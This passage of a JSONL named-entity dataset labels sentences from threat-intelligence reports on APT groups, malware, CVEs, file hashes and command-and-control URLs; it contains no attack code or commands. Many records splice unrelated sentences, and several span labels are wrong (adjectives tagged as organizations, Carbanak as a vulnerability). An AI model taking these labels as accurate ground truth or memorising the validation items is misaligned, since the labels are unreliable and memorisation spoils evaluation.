contents and the sender of all of the SMS messages on the phone to the C2 . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . 
Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000624", "source": "cyberner_stix_valid"}} {"text": "The actor would use the AntSword Shell Manager to interact with the AntSword webshell on the compromised server , as the Shell Manager sends the appropriate script to the webshell that will execute to carry out the desired action .", "spans": {}, "info": {"id": "cyberner_stix_valid_000625", "source": "cyberner_stix_valid"}} {"text": "To maximize profit , variants with “ MinSDK ” or “ OTA ” SDK are present to further infect victims with other adware families . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . For example , the MSI package used in the campaign contains different files , as shown in the table below . The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": {"Vulnerability: InPage exploits": [[160, 175]], "Organization: politically": [[218, 229]], "Organization: militarily": [[233, 243]]}, "info": {"id": "cyberner_stix_valid_000626", "source": "cyberner_stix_valid"}} {"text": "Dumpert is a relatively new tool with its initial commit to GitHub occurring on June 17 , 2019 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000627", "source": "cyberner_stix_valid"}} {"text": "Extract logs from WhatsApp . In September 2015 , our anti-targeted attack technologies caught a previously unknown attack . Similar to previous attacks , this campaign starts with social engineering . 
As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": {"System: WhatsApp": [[18, 26]], "Organization: CISA": [[241, 245]]}, "info": {"id": "cyberner_stix_valid_000628", "source": "cyberner_stix_valid"}} {"text": "Last but not least , all the overlay screens ( injects ) for the banks include two steps ; first stealing the victim ’ s login credentials , then their credit card details . HIVE is a multi-platform CIA malware suite and its associated control software . There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {}, "info": {"id": "cyberner_stix_valid_000629", "source": "cyberner_stix_valid"}} {"text": "Also unusual was the observation that both Dridex and BitPaymer were spread through the victim network using lateral movement techniques traditionally associated with nation-state actors and penetration testing . The ScarCruft group keeps expanding its Exfiltration targets to steal further information from infected hosts and continues to create tools for additional data Exfiltration .", "spans": {}, "info": {"id": "cyberner_stix_valid_000630", "source": "cyberner_stix_valid"}} {"text": "Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": {"Organization: CNIIHM": [[144, 150]]}, "info": {"id": "cyberner_stix_valid_000631", "source": "cyberner_stix_valid"}} {"text": "Based on our telemetry , Kaspersky can reassemble ScarCruft’s binary infection procedure . 
RedDrip Team (formerly SkyEye Team ) has been to OceanLotus to keep track of high strength , groupactivity , found it in the near future to Indochinese Peninsula countries since 2019 On April 1 , 2019 , RedDrip discovered a Vietnamese file name Hop dong sungroup.rar in the process of daily monitoring the attack activities of the OceanLotus . COCCOC is a Vietnam was founded in 2013 . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . these threat actors targeted a number of government agencies threat actors targeted a number of government agencies in East Asia . Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Maudi Surveillance Operation which was previously reported in 2013 . specifically CVE-2018-0798 , before downloading subsequent payloads . The dropped PE file has the distinctive file name 8.t” . The last process is utilized as part of the loading process for Cotx RAT and involves the legitimate Symantec binary noted above . These conflicts have even resulted in Haftar leading an attack on the capital city in April . The attackers have targeted a large number of organizations globally since early 2017 . Attackers were initially discovered while investigating a phishing attack that targeted political figures in the MENA region . Group's targets include high-profile entities such as parliaments , senates , top state offices and officials , political science scholars , military and intelligence agencies , ministries , media outlets , research centers , election commissions , Olympic organizations , large trading companies , and other unknown entities . 
Cisco Talos recently published a blogpost describing targeted attacks in the Middle East region which we believe may be connected . Operation Parliament appears to be another symptom of escalating tensions in the Middle East region . The attackers have taken great care to stay under the radar , imitating another attack group in the region . With deception and false flags increasingly being employed by threat actors , attribution is a hard and complicated task that requires solid evidence , especially in complex regions such as the Middle East . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . The malware starts communicating with the C&C server by sending basic information about the infected machine . The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . What lied beneath this facade was a well-engineered campaign of phishing attacks designed to steal credentials and spy on the activity of dozens of journalists , human rights defenders , trade unions and labour rights activists , many of whom are seemingly involved in the issue of migrants’ rights in Qatar and Nepal . We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” . It is worth noting that in December 2016 , Amnesty International published an investigation into another social engineering campaign perpetrated by a seemingly fake human rights organization known as Voiceless Victims , which targeted international human rights and labour rights organizations campaigning on migrant workers’ rights in Qatar . It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . 
In the course of this email correspondence , the attacker — Safeena” — then sent what appeared to be invitations to access several documents on Google Drive . The attackers were meticulous in making their phishing page as credible as possible . Among the targets of this campaign is the International Trade Union Confederation .", "spans": {"Organization: Kaspersky": [[25, 34]], "Organization: RedDrip Team": [[91, 103]], "Organization: SkyEye Team": [[114, 125]], "Organization: RedDrip": [[294, 301]], "Organization: media": [[676, 681]], "Organization: real estate companies": [[684, 705]], "Organization: foreign enterprises": [[708, 727]], "Organization: banks": [[732, 737]], "Organization: government": [[913, 923]], "Organization: agencies": [[924, 932]], "Organization: Microsoft": [[968, 977]], "Vulnerability: exploit": [[994, 1001]], "Vulnerability: CVE-2018-0798": [[1002, 1015], [1176, 1189]], "Malware: PE": [[1245, 1247]], "Indicator: 8.t”": [[1283, 1287]], "Organization: Symantec": [[1391, 1399]], "Organization: political": [[1691, 1700]], "Organization: parliaments": [[1784, 1795]], "Organization: senates": [[1798, 1805]], "Organization: top state offices": [[1808, 1825]], "Organization: officials": [[1830, 1839]], "Organization: political science scholars": [[1842, 1868]], "Organization: military": [[1871, 1879]], "Organization: intelligence agencies": [[1884, 1905]], "Organization: ministries": [[1908, 1918]], "Organization: media outlets": [[1921, 1934]], "Organization: research centers": [[1937, 1953]], "Organization: election commissions": [[1956, 1976]], "Organization: Olympic organizations": [[1979, 2000]], "Organization: trading companies": [[2009, 2026]], "Organization: unknown entities": [[2039, 2055]], "Organization: Cisco Talos": [[2058, 2069]], "Indicator: malware": [[2613, 2620], [2749, 2756], [2860, 2867]], "Malware: CMD/PowerShell": [[2896, 2910]], "Organization: Trade Union Confederation": [[4352, 4377]]}, "info": {"id": 
"cyberner_stix_valid_000632", "source": "cyberner_stix_valid"}} {"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 exposé on Hidden Lynx .", "spans": {"Organization: defense sector firms": [[31, 51]], "Organization: Chinese dissident groups": [[54, 78]], "Organization: political , financial , pharmaceutical and energy sectors": [[83, 140]]}, "info": {"id": "cyberner_stix_valid_000633", "source": "cyberner_stix_valid"}} {"text": "2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392 .", "spans": {"Indicator: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f": [[0, 64]], "Indicator: af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392": [[65, 129]]}, "info": {"id": "cyberner_stix_valid_000634", "source": "cyberner_stix_valid"}} {"text": "The rootdaemon binary in fact offers several other possibilities to execute commands on the infected device just by connecting to TCP port 6200 and issuing one of the following commands . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction . 
CV Manal 1 : Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": {"Organization: commercial organizations": [[258, 282]], "Organization: government organizations": [[309, 333]], "Indicator: CV Manal 1": [[366, 376]], "Vulnerability: zero - day": [[506, 516]]}, "info": {"id": "cyberner_stix_valid_000635", "source": "cyberner_stix_valid"}} {"text": "First , we determined the sample we collected , d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc was attempting to communicate to its C2 at http://supservermgr.com/sys/upd/pageupd.php to retrieve a Zebrocy AutoIT downloader .", "spans": {"Indicator: d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc": [[48, 112]], "Indicator: http://supservermgr.com/sys/upd/pageupd.php": [[156, 199]], "Malware: Zebrocy": [[214, 221]]}, "info": {"id": "cyberner_stix_valid_000636", "source": "cyberner_stix_valid"}} {"text": "TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . 
If it detects an IP located in Switzerland , the malware will run an obfuscated JavaScript code and find its visiting domain .", "spans": {"Indicator: IP": [[148, 150]], "Malware: malware will": [[180, 192]]}, "info": {"id": "cyberner_stix_valid_000637", "source": "cyberner_stix_valid"}} {"text": "In the decrypted shellcode , we also observed content and configuration related to Poison Ivy .", "spans": {}, "info": {"id": "cyberner_stix_valid_000638", "source": "cyberner_stix_valid"}} {"text": "The IP address has been tied to additional malicious activity in support of the TRITON intrusion .", "spans": {"Malware: TRITON": [[80, 86]]}, "info": {"id": "cyberner_stix_valid_000639", "source": "cyberner_stix_valid"}} {"text": "com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Port 80 and 443 are the default ports for HTTP and HTTPS traffic . 
It crafts configurable IEC-104 Application Service Data Unit ( ASDU ) messages , to change the state of RTU Information Object Addresses ( IOAs ) to ON or OFF .", "spans": {}, "info": {"id": "cyberner_stix_valid_000640", "source": "cyberner_stix_valid"}} {"text": "This alert identifies IP S-PROT addresses linked to systems infected with DeltaCharlie malware and provides descriptions of the malware and associated malware signatures .", "spans": {"Malware: DeltaCharlie": [[74, 86]]}, "info": {"id": "cyberner_stix_valid_000641", "source": "cyberner_stix_valid"}} {"text": "Overall in 2012-2013 we detected approximately 10,000,000 unique malicious installation packages : Different installation packages can install programs with the same functionality that differ only in terms of the malicious app interface and , for instance , the content of the text messages it spreads . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed . In November 2019 , ESET ’s machine-learning engine , Augur , detected a malicious and unique sample present on multiple computers belonging to two Hong Kong universities where the Winnti malware had already been found at the end of October . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": {"Organization: Wikileaks": [[320, 329]], "Organization: ESET": [[422, 426]], "Malware: Winnti": [[583, 589]], "Organization: AshleyMadisonSucks.com": [[690, 712]], "Organization: Ashley Madison": [[743, 757]]}, "info": {"id": "cyberner_stix_valid_000642", "source": "cyberner_stix_valid"}} {"text": "This dropper uses RC4 to decrypt an embedded payload from data in an embedded resource before writing the payload to disk and executing it . 
The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": {"Malware: Trojan": [[171, 177]]}, "info": {"id": "cyberner_stix_valid_000643", "source": "cyberner_stix_valid"}} {"text": "In July , the DCCC announced that it was investigating an ongoing “ cybersecurity incident ” that the FBI believed was linked to the compromise of the DNC .", "spans": {"Organization: DCCC": [[14, 18]], "Organization: FBI": [[102, 105]], "Organization: DNC": [[151, 154]]}, "info": {"id": "cyberner_stix_valid_000644", "source": "cyberner_stix_valid"}} {"text": "The phones are sold at Best Buy and Amazon.com , among other retail outlets . org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut . Therefore , once a user executes the attachment and sees the password dialog on SFX , the downloader dropped by the malicious code starts working even if the user chooses the Cancel on the password window .", "spans": {"Organization: Best Buy": [[23, 31]], "Organization: Amazon.com": [[36, 46]]}, "info": {"id": "cyberner_stix_valid_000645", "source": "cyberner_stix_valid"}} {"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime .", "spans": {"Malware: Backdoor.APT.Pgift": [[54, 72]], "Organization: Group-IB": [[172, 180]]}, "info": {"id": "cyberner_stix_valid_000646", "source": "cyberner_stix_valid"}} {"text": "This agent has two core modules , the Evidence Collector and the Event Action Trigger . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . 
Rolles said this was to handle another obfuscation called “ Odd Stack Manipulations ” Russia has historically used self - proclaimed hacktivist groups as a means to obfuscate its role in operations against Western nations and it is plausible that Zarya or various pro - Russia hacktivists that have risen to prominence since Russia ’s invasion of Ukraine may either be cooperating or coordinating with , or a front for , the Russian security intelligence services .", "spans": {"Vulnerability: Carbanak": [[99, 107]], "Organization: banks": [[167, 172]], "Organization: payment systems": [[179, 194]], "Organization: Western nations": [[403, 418]], "Organization: Russian security intelligence services": [[622, 660]]}, "info": {"id": "cyberner_stix_valid_000647", "source": "cyberner_stix_valid"}} {"text": "The group also does not make special effort to cultivate victims prior to an attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000648", "source": "cyberner_stix_valid"}} {"text": "May 2018 to April 2019 : This is the actual mature stage of “ Agent Smith ” campaign . The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks . Behavioral blocking and containment capabilities are especially effective in defeating Dexphot ’s fileless techniques , detection evasion , and persistence mechanisms , including the periodic and boot-time attempts to update the malware via scheduled tasks . 
If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": {"Malware: Agent Smith": [[62, 73]], "Organization: IT departments": [[107, 121]], "Malware: Dexphot": [[350, 357]], "System: Exchange Server": [[542, 557]]}, "info": {"id": "cyberner_stix_valid_000649", "source": "cyberner_stix_valid"}} {"text": "WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": {"Vulnerability: CVE-2017-0144": [[100, 113]], "Vulnerability: CVE-2017-0145": [[118, 131]], "Vulnerability: zero-day": [[365, 373]]}, "info": {"id": "cyberner_stix_valid_000650", "source": "cyberner_stix_valid"}} {"text": "It communicates with the C2 server using HTTP POST requests .", "spans": {}, "info": {"id": "cyberner_stix_valid_000651", "source": "cyberner_stix_valid"}} {"text": "In the past few years , LEAD ’s victims have included :", "spans": {}, "info": {"id": "cyberner_stix_valid_000652", "source": "cyberner_stix_valid"}} {"text": "Password_Policy.xlsm : 03ea9457bf71d51d8109e737158be888 .", "spans": {"Indicator: Password_Policy.xlsm": [[0, 20]], "Indicator: 03ea9457bf71d51d8109e737158be888": [[23, 55]]}, "info": {"id": "cyberner_stix_valid_000653", "source": "cyberner_stix_valid"}} {"text": "The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . 
In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks .", "spans": {"Organization: military": [[34, 42]], "Organization: government": [[46, 56]], "Organization: higher education": [[78, 94]], "Organization: high tech companies": [[99, 118]], "Malware: Infy": [[267, 271]]}, "info": {"id": "cyberner_stix_valid_000654", "source": "cyberner_stix_valid"}} {"text": "Eventually we observed the agent exfiltrate the WiFi password from our test phone to the Command & Control server : Similarly , the agent also sent to the Command & Control the list of installed apps : This Command & Control seems to have been active since at least April 2017 and was registered impersonating the legitimate service AccuWeather . The first known Suckfly campaign began in April of 2014 . The letter commemorates the 73rd anniversary of the Syrian Army , and expresses the Palestinian support of Bashar Al-Asad . Attackers may perform seemingly authorized actions but left unchecked , victims may be met with an unwelcome surprise .", "spans": {"System: AccuWeather": [[333, 344]], "Organization: Syrian Army": [[457, 468]], "Organization: victims": [[601, 608]]}, "info": {"id": "cyberner_stix_valid_000655", "source": "cyberner_stix_valid"}} {"text": "As XENOTIME matures , it is less likely that the group will make this mistake in the future .", "spans": {}, "info": {"id": "cyberner_stix_valid_000656", "source": "cyberner_stix_valid"}} {"text": "Then the malware leaves a positive review and a high rating on Google Play using content it receives from the C & C server . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . 
In another example , Last , it sends a single “ C_CS_NA_1 – clock synchronization command ” to the target station , which synchronizes the remote station time clock with the time clock for the device issuing the commands .", "spans": {"System: Google Play": [[63, 74]], "Organization: government agencies": [[236, 255]], "Organization: biotechnology": [[276, 289]], "Organization: electronics manufacturing": [[292, 317]], "Organization: industrial chemistry": [[324, 344]]}, "info": {"id": "cyberner_stix_valid_000657", "source": "cyberner_stix_valid"}} {"text": "Alert : HIDDEN COBRA - North Korea 's DDoS Botnet I-TOOL Infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000658", "source": "cyberner_stix_valid"}} {"text": "What is the scope of Chrysaor ? Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability . That attack was attributed to perpetrators Kaspersky called the Winnti Group . In reality he stated he simply loved to rob banks .", "spans": {"Malware: Chrysaor": [[21, 29]], "Organization: Kaspersky": [[174, 183]]}, "info": {"id": "cyberner_stix_valid_000659", "source": "cyberner_stix_valid"}} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity .", "spans": {"Vulnerability: zero-day exploits": [[143, 160]], "Vulnerability: exploit": [[281, 288]], "Vulnerability: CVE-2017-1182": [[289, 302]], "Indicator: Microsoft Equation Editor": [[320, 345]], "Indicator: 'EQNEDT32.exe'": [[348, 362]]}, "info": {"id": "cyberner_stix_valid_000660", "source": "cyberner_stix_valid"}} {"text": "The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware . Inspecting the class C network for 185.162.235.0/24 shows us that another IP on the same network resolves to an OilRig domain , msoffice-cdn.com which we identified in August 2017 . This binary downloads a new file on Google Drive . We were able to find additional links between Hack520 ’s “ Pig network ” and the Winnti group ’s activities .", "spans": {"Malware: RuMMS": [[11, 16]]}, "info": {"id": "cyberner_stix_valid_000661", "source": "cyberner_stix_valid"}} {"text": "This was followed by an initial exploitation , network enumeration , and malicious tool deployment on various Visma endpoints within two weeks of initial access . 
The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": {"Indicator: files": [[167, 172]], "Vulnerability: exploit": [[173, 180]], "Vulnerability: CVE-2012-0158": [[229, 242]]}, "info": {"id": "cyberner_stix_valid_000662", "source": "cyberner_stix_valid"}} {"text": "I didn’t just revive the C2 but also added more advanced functionality which will be released as separate tool soon .", "spans": {}, "info": {"id": "cyberner_stix_valid_000663", "source": "cyberner_stix_valid"}} {"text": "This is not a new tactic but may be more effective at evading detection as the external hosts involved are a legitimate email service provider .", "spans": {}, "info": {"id": "cyberner_stix_valid_000664", "source": "cyberner_stix_valid"}} {"text": "The leaked NSA documents and tools published in recent months by the mysterious Shadow Brokers group have provided rare insight into the clandestine digital espionage operations pursued by the spy agency over the past few years , including information on operations aimed at Iran and Russia . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": {"Organization: NSA": [[11, 14]], "Organization: spy agency": [[193, 203]], "Organization: ethnic minorities": [[343, 360]], "Organization: religious groups": [[365, 381]]}, "info": {"id": "cyberner_stix_valid_000665", "source": "cyberner_stix_valid"}} {"text": "] today : Som Tum We also identified comments in Thai on the C2 infrastructure mentioned in the previous chapter : MALWARE DenDroid The Android malware is based on the DenDroid Android malware . it reports to was created on August 10 , 2011 . The malware ID seems to be a campaign code with a different IP address for each attack . 
By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": {"Malware: DenDroid": [[123, 131], [168, 176]], "System: Android": [[136, 143]], "Vulnerability: a gap in the implementation of CSP , and even for sites that do use it correctly": [[363, 443]]}, "info": {"id": "cyberner_stix_valid_000666", "source": "cyberner_stix_valid"}} {"text": "The service name makes it clear that by applications the attackers mean MDM solutions that are business-specific tools . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US” , the same hosting provider that the group used in attacks over the summer of 2016 . Naikon is a threat group that has focused on targets around the South China Sea .", "spans": {}, "info": {"id": "cyberner_stix_valid_000667", "source": "cyberner_stix_valid"}} {"text": "If this execution is successful , it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from http://45.76.128.165:4443/0w0O6 .", "spans": {"Indicator: http://45.76.128.165:4443/0w0O6": [[157, 188]]}, "info": {"id": "cyberner_stix_valid_000668", "source": "cyberner_stix_valid"}} {"text": "If certain security products are installed , the backdoor does not carry out its malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_valid_000669", "source": "cyberner_stix_valid"}} {"text": "] 160 [ . Once a foothold is established , Sofacy trys to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . Once the junk code was removed from the VBScript , there are approximately 18 lines of relevant code , which ultimately call a shape box in the current document . 
This first step provides a SSRF equivalent to the technique used in ProxyNotShell exploitation .", "spans": {}, "info": {"id": "cyberner_stix_valid_000670", "source": "cyberner_stix_valid"}} {"text": "So I think that the authors are still testing this malware , because they use some techniques which can break the infected devices . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 . We uncovered a substantial amount of APT1 ’s attack infrastructure , command and control , and modus operandi ( tools , tactics , and procedures ) . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": {}, "info": {"id": "cyberner_stix_valid_000671", "source": "cyberner_stix_valid"}} {"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": {"Vulnerability: zero-day vulnerability": [[18, 40]], "Vulnerability: CVE-2015-2545": [[51, 64]]}, "info": {"id": "cyberner_stix_valid_000672", "source": "cyberner_stix_valid"}} {"text": "Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . 
While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": {"Vulnerability: CVE-2018-8414": [[74, 87]], "Vulnerability: CVE-2014-0515": [[279, 292]], "Vulnerability: exploit": [[305, 312]], "Organization: Cisco TRAC": [[331, 341]]}, "info": {"id": "cyberner_stix_valid_000673", "source": "cyberner_stix_valid"}} {"text": "As you probably have noticed , gaining root access gives them the capability to download and install applications — that ’ s the reason why once one of them get into the system , in a few minutes there are all the others . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia .", "spans": {"Vulnerability: CVE-2012-0158": [[290, 303]], "Organization: Unit 42": [[354, 361]], "Organization: financial institutions": [[410, 432]], "Organization: technology organizations": [[437, 461]]}, "info": {"id": "cyberner_stix_valid_000674", "source": "cyberner_stix_valid"}} {"text": "In this blog post , we do not differentiate between the rooting component and the component that abuses root : we refer to them interchangeably as Zen . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime . The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website , as both discussed national defense topics and carried the same byline . 
In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": {"Malware: Zen": [[147, 150]], "Organization: Group-IB": [[153, 161]], "Organization: Mandiant": [[529, 537]]}, "info": {"id": "cyberner_stix_valid_000675", "source": "cyberner_stix_valid"}} {"text": "Roaming Mantis is believed to be a Chinese threat actor group first discovered in April 2018 that has continuously evolved . We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . RoyalDNS - required APT15 .", "spans": {"Organization: Roaming Mantis": [[0, 14]], "Organization: We": [[125, 127]], "Malware: RoyalDNS": [[306, 314]]}, "info": {"id": "cyberner_stix_valid_000676", "source": "cyberner_stix_valid"}} {"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted .", "spans": {"Malware: Margarita": [[33, 42]], "Organization: Arab Emirates": [[248, 261]]}, "info": {"id": "cyberner_stix_valid_000677", "source": "cyberner_stix_valid"}} {"text": "A new campaign is up and running using newly improved , significantly more powerful malware as compared to previous versions . These malware families have a rich history of being used in many targeted attacks against government and private organizations . 
The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro .", "spans": {"Malware: malware": [[133, 140]], "Organization: government": [[217, 227]], "Organization: private": [[232, 239]], "Organization: organizations": [[240, 253]], "Organization: Symantec": [[428, 436]], "Organization: Trend Micro": [[441, 452]]}, "info": {"id": "cyberner_stix_valid_000678", "source": "cyberner_stix_valid"}} {"text": "Malicious Instagram account : https : //www.instagram.com/freedomguidepeople1830/ Malicious Tumblr accounts : https : //mainsheetgyam.tumblr.com/ https : //hormonaljgrj.tumblr.com/ https : //globalanab.tumblr.com/ C & C addresses : 104 [ . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan . The vast majority of that was junk code . Two days after the OT event , Sandworm deployed a new variant of CADDYWIPER in the victim ’s IT environment to cause further disruption and potentially to remove forensic artifacts .", "spans": {"Organization: Instagram": [[10, 19]], "Organization: Tumblr": [[92, 98]], "Malware: CADDYWIPER": [[579, 589]], "System: victim ’s IT environment": [[597, 621]]}, "info": {"id": "cyberner_stix_valid_000679", "source": "cyberner_stix_valid"}} {"text": "Office 365 Advanced Threat Protection secures mailboxes from email campaigns that use zero-day exploits to deliver threats like FinFisher . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries . OceanLotus : {5035383A-F7B0-424A-9C9A-CA667416BA6F} port number 4 0x1BB ( 443 ) ( config+0x46C ) . 
The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"System: Office 365 Advanced Threat Protection": [[0, 37]], "Vulnerability: zero-day exploits": [[86, 103]], "Malware: FinFisher": [[128, 137]], "Organization: Microsoft": [[470, 479]]}, "info": {"id": "cyberner_stix_valid_000680", "source": "cyberner_stix_valid"}} {"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"Vulnerability: Heartbleed vulnerability": [[36, 60]], "Vulnerability: exploit": [[169, 176]], "Vulnerability: CVE-2016-4117": [[183, 196]]}, "info": {"id": "cyberner_stix_valid_000681", "source": "cyberner_stix_valid"}} {"text": "e3f77ff093f322e139940b33994c5a57ae010b66668668dc4945142a81bcc049 ebd0a8043434edac261cb25b94f417188a5c0d62b5dd4033f156b890d150a4c5 f51a27163cb0ddd08caa29d865b9f238848118ba2589626af711330481b352df Tracking down the developer of Android adware affecting Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations . As in the previous version , the persistence is achieved by a Windows shortcut (in this case adobe distillist.lnk ) .", "spans": {"System: Android": [[226, 233]], "Organization: Recorded Future": [[251, 266]], "System: Windows": [[432, 439]], "Indicator: distillist.lnk": [[469, 483]]}, "info": {"id": "cyberner_stix_valid_000682", "source": "cyberner_stix_valid"}} {"text": "Machine learning in Windows Defender ATP further flags suspicious behaviors observed related to the manipulation of legitimate Windows binaries . 
